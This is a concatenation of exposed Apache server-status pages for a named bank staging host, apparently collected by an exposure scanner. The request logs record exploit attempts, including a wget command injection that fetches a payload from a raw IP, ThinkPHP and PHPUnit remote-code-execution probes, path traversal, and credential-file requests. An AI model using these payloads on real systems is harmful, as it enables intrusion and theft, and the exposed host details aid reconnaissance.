0.008711551807520.00.007.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.0087115501242840.00.007.90
127.0.0.1http/1.1127.0.1.1:8080GET /index.php?s=/Index/\\think\\app/invokefunction&function=call
0-80-0/0/1427.
0.008711550842500.00.0014.61
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/cgi_main.cgi HTTP/1.1
0-80-0/0/1452.
0.008711550873780.00.005.65
127.0.0.1http/1.1127.0.1.1:8080GET /__down?bytes=10 HTTP/1.1
0-80-0/0/1450.
0.008711551758340.00.007.28
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1422.
0.008711551872420.00.0015.27
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1436.
0.008711550839090.00.005.78
127.0.0.1http/1.1127.0.1.1:8080GET /HNAP1/ HTTP/1.1
0-80-0/0/1458.
0.008711550861330.00.0019.53
127.0.0.1http/1.1127.0.1.1:8080POST /dvr/cmd HTTP/1.1
0-80-0/0/1430.
0.008711551844070.00.007.30
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1428.
0.008711550940400.00.0012.18
127.0.0.1http/1.1127.0.1.1:8080GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20
0-80-0/0/1445.
0.008711550882420.00.007.60
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/system_mgr.cgi? HTTP/1.1
0-80-0/0/1453.
0.008711550866550.00.007.23
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1422.
0.008711551852040.00.006.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-915209150/3/3117_
0.13303235220.00.0022.46
127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1
1-915209150/2/3052_
0.13303171000.00.0023.03
127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1
1-915209150/3/2947_
0.13203155010.00.0122.18
127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1
1-915209150/2/3076_
0.13203282240.00.0021.60
127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1
1-915209150/3/3042_
0.13203237220.00.0120.37
127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1
1-915209150/3/3026_
0.13103049640.00.0124.45
127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1
1-915209150/2/3063_
0.13103586000.00.0020.46
127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1
1-915209150/3/3058_
0.13103249520.00.0121.38
127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1
1-915209150/2/2946_
0.12603220430.00.0022.39
127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1
1-915209150/2/3028_
0.13502981900.00.0020.47
127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1
1-915209150/2/3086_
0.13403309920.00.0024.29
127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1
1-915209150/3/2996_
0.13002946710.00.0019.66
127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
1-9152091524/2/3078W
0.10003248760.00.0027.90
127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1
1-915209150/1/3068_
0.079413225020.00.0022.99
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-915209150/2/3032_
0.12803442840.00.0030.01
127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1
1-915209150/3/3071_
0.13303301380.00.0122.40
127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1
1-915209150/3/3071_
0.12703166590.00.0119.03
127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1
1-915209150/2/3030_
0.12703329880.00.0022.00
127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1
1-915209150/2/3027_
0.12703199920.00.0022.61
127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1
1-915209150/3/3074_
0.12703214450.00.0120.57
127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1
1-915209150/3/2994_
0.13103268590.00.0121.26
127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1
1-915209150/2/3027_
0.13003209980.00.0019.28
127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1
1-915209150/2/3094_
0.12503013430.00.0042.33
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1
1-915209150/3/3057_
0.13503116090.00.0120.49
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1
1-915209150/3/3037_
0.13403036550.00.0020.30
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1
2-78-0/0/2607.
0.00104395403260
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25141e5a6c8
Apache Status
Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1)
Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w
Server MPM: event
Server Built: 2025-07-29T20:18:46
Current Time: Friday, 28-Nov-2025 21:49:58 CET
Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST
Parent Server Config. Generation: 89
Parent Server MPM Generation: 88
Server uptime: 87 days 10 hours 35 minutes 32 seconds
Server load: 0.00 0.00 0.00
Total accesses: 218379 - Total Traffic: 1.7 GB - Total Duration: 21714839
CPU Usage: u219.28 s307.19 cu391.15 cs120.87 - .0137% CPU load
.0289 requests/sec - 235 B/second - 8.0 kB/request - 99.4365 ms/request
1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers
SlotPIDStoppingConnections
ThreadsAsync connections
totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing
176649no0yes00250000
376647no1yes10240010
Sum201 10490010
........................._________________________..............
..........._____W___________________............................
......................
Scoreboard Key:
"_" Waiting for Connection,
"S" Starting up,
"R" Reading Request,
"W" Sending Reply,
"K" Keepalive (read),
"D" DNS Lookup,
"C" Closing connection,
"L" Logging,
"G" Gracefully finishing,
"I" Idle cleanup of worker,
"." Open slot with no current process
SrvPIDAccMCPU
SSReqDurConnChildSlotClientProtocolVHostRequest
0-80-0/0/1445.
0.006833940876330.00.006.44
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1477.
0.006833940854180.00.006.75
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/login.cgi HTTP/1.1
0-80-0/0/1456.
0.006833940795740.00.006.64
127.0.0.1http/1.1127.0.1.1:8080POST /goform/mp HTTP/1.1
0-80-0/0/1431.
0.006833942923170.00.008.09
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
0-80-0/0/1471.
0.006833941959160.00.005.97
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1467.
0.0068339401120610.00.008.87
127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sb
0-80-0/0/1496.
0.006833941980370.00.0022.71
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1464.
0.006833940872930.00.0028.32
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1469.
0.006833940954320.00.006.82
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1447.
0.006833941804010.00.007.07
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.006833940763390.00.0018.86
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1455.
0.0068339401128510.00.0028.52
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1422.
0.006833941807520.00.007.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.0068339401242840.00.007.90
127.0.0.1http/1.1127.0.1.1:8080GET /index.php?s=/Index/\\think\\app/invokefunction&function=call
0-80-0/0/1427.
0.006833940842500.00.0014.61
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/cgi_main.cgi HTTP/1.1
0-80-0/0/1452.
0.006833940873780.00.005.65
127.0.0.1http/1.1127.0.1.1:8080GET /__down?bytes=10 HTTP/1.1
0-80-0/0/1450.
0.006833941758340.00.007.28
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1422.
0.006833941872420.00.0015.27
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1436.
0.006833940839090.00.005.78
127.0.0.1http/1.1127.0.1.1:8080GET /HNAP1/ HTTP/1.1
0-80-0/0/1458.
0.006833940861330.00.0019.53
127.0.0.1http/1.1127.0.1.1:8080POST /dvr/cmd HTTP/1.1
0-80-0/0/1430.
0.006833941844070.00.007.30
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1428.
0.006833940940400.00.0012.18
127.0.0.1http/1.1127.0.1.1:8080GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20
0-80-0/0/1445.
0.006833940882420.00.007.60
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/system_mgr.cgi? HTTP/1.1
0-80-0/0/1453.
0.006833940866550.00.007.23
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1422.
0.006833941852040.00.006.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-88766490/40/3046_
2.0569803234490.00.0822.37
127.0.0.1http/1.1127.0.1.1:8080GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1-88766490/37/2979_
2.06429603170280.00.1022.93
127.0.0.1http/1.1127.0.1.1:8080GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT
1-88766490/36/2878_
2.04428303154330.00.1222.08
127.0.0.1http/1.1127.0.1.1:8080GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP
1-88766490/40/3006_
2.06429303281410.00.1121.50
127.0.0.1http/1.1127.0.1.1:8080GET /index.php?s=/index/\\think\\app/invokefunction&function=call
1-88766490/42/2968_
2.06429403236600.00.1620.27
127.0.0.1http/1.1127.0.1.1:8080GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT
1-88766490/42/2951_
2.05337103048850.00.1624.34
127.0.0.1http/1.1127.0.1.1:8080GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H
1-88766490/40/2988_
2.06428803585130.00.1520.34
127.0.0.1http/1.1127.0.1.1:8080GET /containers/json HTTP/1.1
1-88766490/39/2984_
2.07230913248840.00.1721.26
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-88766490/35/2879_
2.0770403219850.00.2422.28
127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1
1-88766490/39/2954_
2.0770302981130.00.5620.36
127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1
1-88766490/37/3019_
2.0569803309360.00.0724.21
127.0.0.1http/1.1127.0.1.1:8080GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT
1-88766490/32/2923_
2.05230402945940.00.0719.55
127.0.0.1http/1.1127.0.1.1:8080GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT
1-88766490/34/3008_
2.06429703248090.00.0927.80
127.0.0.1http/1.1127.0.1.1:8080GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1-88766490/33/2993_
2.06337623224240.00.1622.89
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
1-88766490/40/2957_
2.06429203442050.00.1829.90
127.0.0.1http/1.1127.0.1.1:8080GET /public/index.php?s=/index/\\think\\app/invokefunction&functi
1-88766490/33/2993_
2.05337103300450.00.5222.30
127.0.0.1http/1.1127.0.1.1:8080GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP
1-88766490/37/2989_
2.05429903165690.00.1318.91
127.0.0.1http/1.1127.0.1.1:8080GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-
1-88766490/37/2963_
2.05230403329180.00.0721.91
127.0.0.1http/1.1127.0.1.1:8080GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT
1-88766490/36/2955_
2.06429003199130.00.1222.49
127.0.0.1http/1.1127.0.1.1:8080GET /index.php?lang=../../../../../../../../usr/local/lib/php/p
1-88766490/38/3005_
2.04428303213850.00.1520.49
127.0.0.1http/1.1127.0.1.1:8080GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT
1-88766490/38/2921_
2.05327503267890.00.1821.15
127.0.0.1http/1.1127.0.1.1:8080GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1-88766490/35/2954_
2.06429803209250.00.1119.17
127.0.0.1http/1.1127.0.1.1:8080GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H
1-88766490/31/3020_
2.06328003012790.00.1542.24
127.0.0.1http/1.1127.0.1.1:8080GET /developmentserver/metadatauploader HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251524fd15c
Apache Status
Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1)
Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w
Server MPM: event
Server Built: 2025-07-29T20:18:46
Current Time: Wednesday, 26-Nov-2025 21:51:02 CET
Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST
Parent Server Config. Generation: 87
Parent Server MPM Generation: 86
Server uptime: 85 days 10 hours 36 minutes 35 seconds
Server load: 0.03 0.01 0.00
Total accesses: 214713 - Total Traffic: 1.6 GB - Total Duration: 21678262
CPU Usage: u212.75 s300.07 cu386.52 cs119.07 - .0138% CPU load
.0291 requests/sec - 239 B/second - 8.0 kB/request - 100.964 ms/request
1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers
SlotPIDStoppingConnections
ThreadsAsync connections
totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing
13973711no0yes10240000
33973710no0yes00250000
Sum200 10490000
........................._________________W_______..............
..........._________________________............................
......................
Scoreboard Key:
"_" Waiting for Connection,
"S" Starting up,
"R" Reading Request,
"W" Sending Reply,
"K" Keepalive (read),
"D" DNS Lookup,
"C" Closing connection,
"L" Logging,
"G" Gracefully finishing,
"I" Idle cleanup of worker,
"." Open slot with no current process
SrvPIDAccMCPU
SSReqDurConnChildSlotClientProtocolVHostRequest
0-80-0/0/1445.
0.005106580876330.00.006.44
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1477.
0.005106580854180.00.006.75
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/login.cgi HTTP/1.1
0-80-0/0/1456.
0.005106580795740.00.006.64
127.0.0.1http/1.1127.0.1.1:8080POST /goform/mp HTTP/1.1
0-80-0/0/1431.
0.005106582923170.00.008.09
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
0-80-0/0/1471.
0.005106581959160.00.005.97
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1467.
0.0051065801120610.00.008.87
127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sb
0-80-0/0/1496.
0.005106581980370.00.0022.71
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1464.
0.005106580872930.00.0028.32
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1469.
0.005106580954320.00.006.82
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1447.
0.005106581804010.00.007.07
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.005106580763390.00.0018.86
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1455.
0.0051065801128510.00.0028.52
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1422.
0.005106581807520.00.007.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.0051065801242840.00.007.90
127.0.0.1http/1.1127.0.1.1:8080GET /index.php?s=/Index/\\think\\app/invokefunction&function=call
0-80-0/0/1427.
0.005106580842500.00.0014.61
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/cgi_main.cgi HTTP/1.1
0-80-0/0/1452.
0.005106580873780.00.005.65
127.0.0.1http/1.1127.0.1.1:8080GET /__down?bytes=10 HTTP/1.1
0-80-0/0/1450.
0.005106581758340.00.007.28
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1422.
0.005106581872420.00.0015.27
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1436.
0.005106580839090.00.005.78
127.0.0.1http/1.1127.0.1.1:8080GET /HNAP1/ HTTP/1.1
0-80-0/0/1458.
0.005106580861330.00.0019.53
127.0.0.1http/1.1127.0.1.1:8080POST /dvr/cmd HTTP/1.1
0-80-0/0/1430.
0.005106581844070.00.007.30
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1428.
0.005106580940400.00.0012.18
127.0.0.1http/1.1127.0.1.1:8080GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20
0-80-0/0/1445.
0.005106580882420.00.007.60
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/system_mgr.cgi? HTTP/1.1
0-80-0/0/1453.
0.005106580866550.00.007.23
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1422.
0.005106581852040.00.006.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-8639737110/38/2950_
2.00003233130.01.0822.20
127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1
1-8639737110/41/2888_
2.00003159920.00.0822.75
127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1
1-8639737110/36/2789_
2.00003152740.00.0721.87
127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1
1-8639737110/33/2911_
2.00003278030.00.0721.31
127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1
1-8639737110/37/2866_
2.00103184340.00.0620.00
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1
1-8639737110/39/2855_
1.99103046410.00.0624.09
127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1
1-8639737110/37/2896_
2.00103581060.00.0720.12
127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1
1-8639737110/38/2888_
2.00103246840.00.0621.01
127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1
1-8639737110/38/2792_
1.99103209650.00.0721.96
127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1
1-8639737110/37/2861_
2.00102969280.00.0819.72
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1
1-8639737110/40/2919_
1.99103303870.00.0824.04
127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1
1-8639737110/34/2833_
2.00102944850.00.0519.40
127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1
1-8639737110/38/2922_
1.99103246100.00.0727.63
127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1
1-8639737110/35/2905_
2.00103216010.00.0822.63
127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1
1-8639737110/37/2860_
2.00103437770.00.0629.64
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1
1-8639737110/33/2910_
1.99103297010.00.0621.70
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-8639737110/40/2898_
2.00003163550.00.0718.70
127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1
1-86397371125/38/2869W
1.93003325740.00.1421.75
127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1
1-8639737110/34/2868_
2.00003196900.00.0822.30
127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1
1-8639737110/41/2910_
2.00003211440.00.0620.25
127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
1-8639737110/37/2829_
2.00003259380.00.0920.89
127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1
1-8639737110/40/2866_
2.00003167680.00.0618.98
127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1
1-8639737110/39/2933_
2.00003009770.00.0842.01
127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1
1-8639737110/37/2889_
2.00003112570.00.0920.04
127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1
1-8639737110/34/2863_
2.00003029410.00.0619.99
127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1
2-78-0/0/2607
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2518a5e0189
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Tuesday, 18-Nov-2025 07:07:39 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 79 Parent Server MPM Generation: 78 Server uptime: 76 days 19 hours 53 minutes 12 seconds Server load: 0.19 0.16 0.16 Total accesses: 180622 - Total Traffic: 1.4 GB - Total Duration: 15960208 CPU Usage: u196.35 s271.02 cu312.54 cs97.99 - .0132% CPU load .0272 requests/sec - 224 B/second - 8.1 kB/request - 88.3625 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 12444846no0yes00250000 22444845no2yes10240010 Sum202 10490010 ........................._______________________________________ __W________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1137. 0.0016672550129060.00.003.89 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1165. 0.0016672550150680.00.004.12 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1148. 0.0016672550126900.00.003.69 127.0.0.1http/1.1127.0.1.1:8080GET /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1134. 0.0016672550142600.00.005.54 127.0.0.1http/1.1127.0.1.1:8080POST /sapi/debug/default/view HTTP/1.1 0-58-0/0/1161. 0.0016672550230570.00.003.77 127.0.0.1http/1.1127.0.1.1:8080POST /phpinfo HTTP/1.1 0-58-0/0/1152. 0.0016672550354990.00.005.74 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view HTTP/1.1 0-58-0/0/1186. 0.0016672550183540.00.0019.75 127.0.0.1http/1.1127.0.1.1:8080GET /aws.yml HTTP/1.1 0-58-0/0/1154. 0.0016672550183980.00.0025.62 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-58-0/0/1153. 0.0016672550156410.00.004.08 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1142. 0.0016672550112340.00.004.25 127.0.0.1http/1.1127.0.1.1:8080POST /frontend/web/debug/default/view HTTP/1.1 0-58-0/0/1131. 0.001667255298810.00.005.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1132. 0.0016672551342330.00.0025.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1127. 0.0016672550149300.00.004.83 127.0.0.1http/1.1127.0.1.1:8080GET /config.js HTTP/1.1 0-58-0/0/1147. 0.0016672550533170.00.004.76 127.0.0.1http/1.1127.0.1.1:8080POST /.aws/credentials HTTP/1.1 0-58-0/0/1125. 0.0016672552135190.00.0012.44 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-58-0/0/1145. 0.0016672550108150.00.003.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1143. 0.0016672550105370.00.004.57 127.0.0.1http/1.1127.0.1.1:8080POST /config/aws.yml HTTP/1.1 0-58-0/0/1127. 0.0016672550188130.00.0012.96 127.0.0.1http/1.1127.0.1.1:8080POST /%C0 HTTP/1.1 0-58-0/0/1129. 0.0016672551115990.00.003.39 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-58-0/0/1139. 0.0016672550116320.00.0017.03 127.0.0.1http/1.1127.0.1.1:8080POST /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1127. 0.0016672550138610.00.004.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1124. 0.0016672550218130.00.009.64 127.0.0.1http/1.1127.0.1.1:8080POST /web/debug/default/view HTTP/1.1 0-58-0/0/1138. 0.0016672550166610.00.004.84 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1144. 0.0016672550127130.00.004.36 127.0.0.1http/1.1127.0.1.1:8080POST /wp-config.php-backup HTTP/1.1 0-58-0/0/1106. 0.0016672550131870.00.003.51 127.0.0.1http/1.1127.0.1.1:8080POST /tool/view/phpinfo.view.php HTTP/1.1 1-7824448460/84/2581_ 5.91373192948100.00.5819.58 127.0.0.1http/1.1centralrefonte.projet-client.coPOST /wp-admin/admin-ajax.php HTTP/1.1 1-7824448460/82/2525_ 5.88554682889750.00.4321.46 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/e-payement-2/ HTTP/1.1 1-7824448460/76/2443_ 5.862712894960.00.4720.71 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-7824448460/84/2566_ 5.90432753027550.00.5319.94 127.0.0.1http/1.1centralrefonte.projet-client.coPOST /wp-admin/admin-ajax.php HTTP/1.1 1-7824448460/79/2515_ 5.91384862945590.00.5318.61 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/slide-web-e-paiement/ HTTP/1.1 1-7824448460/84/2505_ 5.90434952795030.00.4522.98 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/operation/ HTTP/1.1 1-7824448460/71/2535_ 5.92322603300150.00.3518.60 127.0.0.1http/1.1centralrefonte.projet-client.coPOST /wp-admin/admin-ajax.php HTTP/1.1 1-7824448460/83/2527_ 5.87654642976480.00.5319.85 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/depot-tcheck/ HTTP/1.1 1-7824448460/82/2448_ 5.88602632957790.00.4620.81 127.0.0.1http/1.1centralrefonte.projet-client.coPOST /wp-admin/admin-ajax.php HTTP/1.1 1-7824448460/83/2510_ 5.87652692713370.00.4818.60 127.0.0.1http/1.1centralrefonte.projet-client.coPOST /wp-admin/admin-ajax.php HTTP/1.1 1-7824448460/92/2569_ 5.88604732997980.00.4222.17 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/cash-cash/ HTTP/1.1 1-7824448460/77/2477_ 5.904302691110.00.5217.82 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-7824448460/83/2563_ 5.91331902966230.00.5525.44 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/slide-e-paiement HTTP/1.1 1-7824448460/80/2546_ 5.89492102929970.00.3921.40 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/phone-2 HTTP/1.1 1-7824448460/88/2512_ 5.91381813157220.00.4128.39 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/slide-web-e-paiement HTTP/1.1 1-7824448460/77/2550_ 5.88551693013010.00.5820.37 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/e-payement-2 HTTP/1.1 1-7824448460/85/2526_ 5.90492512898590.00.4417.41 127.0.0.1http/1.1centralrefonte.projet-client.coPOST /wp-admin/admin-ajax.php HTTP/1.1 1-7824448460/86/2518_ 5.90495133042490.00.6018.68 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/phone-2/ HTTP/1.1 1-7824448460/78/2510_ 5.92324682929760.00.4920.97 127.0.0.1http/1.1centralrefonte.projet-client.coGET /e-paiement-2/slide-e-paiement/ HTTP/1.1 1-7824448460/80/2537_ 